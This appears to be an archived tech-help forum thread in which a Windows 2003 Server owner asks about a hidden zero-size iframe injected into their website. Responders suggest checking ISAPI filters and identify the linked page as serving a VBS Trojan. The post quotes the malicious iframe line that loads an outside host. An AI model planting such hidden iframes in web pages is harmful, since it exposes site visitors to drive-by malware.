Solved

Virus on windows 2003 server: Iframe in top of website

Posted on 2006-10-29
3
209 Views
Last Modified: 2013-12-04
Hello,

I got a virus on my Windows 2003 Server.
On one of our major websites this line of code is placed in the top of the page:

<iframe src="http://ricewine.be/hhbb.htm" width="0" height="0" frameborder="0"></iframe>

If I open the webpage and look in the asp-file on the server, the  "iframe"-code is not there!

Anyone who know what this is? How to remove it, and why I got it?
Yes, all my software is legal, no software cracks on the server ;)

Please give me some tips to remove the virus!!!!
0
Comment
Question by:webressurs
3 Comments
 
LVL 34

Expert Comment

by:Dave_Dietz
ID: 17830566
Are you hosting this on your server or is it at a hosting facility?

Do you have any ISAPI filters or wildcard application mappings configured?

Dave Dietz
0
 
LVL 1

Author Comment

by:webressurs
ID: 17832144
Yes, this is my own windows 2003 webserver.
I dont really know wht ISAPI or wildcard application are, so I guess I dont use it :)
Mabye a virus have installed something like this...? I dont unerstand how this Iframe can appear in the website header, and how to remove it...?
0
 
LVL 6

Accepted Solution

by:
Mnf earned 500 total points
ID: 17836206
i followed the link you specify and a Trojan with " VBS.Psyme.cf" was catched by kaspersky antivirus
look at this article to know more detailed about it and how it works.
http://www.f-secure.com/v-descs/fagot.shtml

i think any kind of antivirus program is good to identify this virus

0

Featured Post

Announcing the Most Valuable Experts of 2016

MVEs are more concerned with the satisfaction of those they help than with the considerable points they can earn. They are the types of people you feel privileged to call colleagues. Join us in honoring this amazing group of Experts.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
With Secure Portal Encryption, the recipient is sent a link to their email address directing them to the email laundry delivery page. From there, the recipient will be required to enter a user name and password to enter the page. Once the recipient …

792 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question